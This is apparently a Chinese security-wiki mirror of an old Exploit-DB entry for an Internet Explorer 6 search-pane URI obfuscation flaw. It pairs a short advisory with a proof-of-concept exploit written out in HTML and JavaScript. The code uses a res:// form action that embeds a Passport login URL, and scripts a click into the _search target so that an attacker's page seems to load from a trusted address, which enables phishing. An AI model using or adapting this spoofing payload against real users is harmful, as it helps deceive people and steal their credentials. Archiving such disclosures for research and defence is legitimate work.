Microsoft Internet Explorer 6 – Search Pane URI Obfuscation

Microsoft Internet Explorer 6 – Search Pane URI Obfuscation

漏洞ID 1054790 漏洞类型
发布时间 2004-12-08 更新时间 2004-12-08
图片[1]-Microsoft Internet Explorer 6 – Search Pane URI Obfuscation-安全小百科CVE编号 N/A
图片[2]-Microsoft Internet Explorer 6 – Search Pane URI Obfuscation-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24808
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11851/info

A remote URI obfuscation vulnerability has been found in Internet Explorer's search pane functionality. This issue is due to a failure of the application to present the URI address of HTML and script code loaded into the search pane.

This issue may be leveraged by an attacker to display misleading information in the address bar of the browser to an unsuspecting user while loading a third party Web site in the search pane. This may allow an attacker to present web pages to users that seem to originate from a trusted location. This may facilitate phishing style attacks; other attacks may also be possible.

<form id="foo" action="res://C:WINDOWSsystem32shdoclc.dll/dnserror.htm#http://login.passport.net/uilogin.srf?id=malware.is.here" method="post"><


<input type="submit" value="default value">
</form>

<a id="fee" href="hotfemail.html" target="_search">test</a>

<script>

var malware = screen.availHeight;
window.moveTo(0, 0);
window.resizeTo(500, malware);
fee.click()
// setTimeout("fee.click();",1);

setTimeout("foo.submit();",1);


</script>

相关推荐: Methodus 3 Web Server – File Disclosure

Methodus 3 Web Server – File Disclosure 漏洞ID 1053955 漏洞类型 发布时间 2003-06-13 更新时间 2003-06-13 CVE编号 N/A CNNVD-ID N/A 漏洞平台 Windows CVSS…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享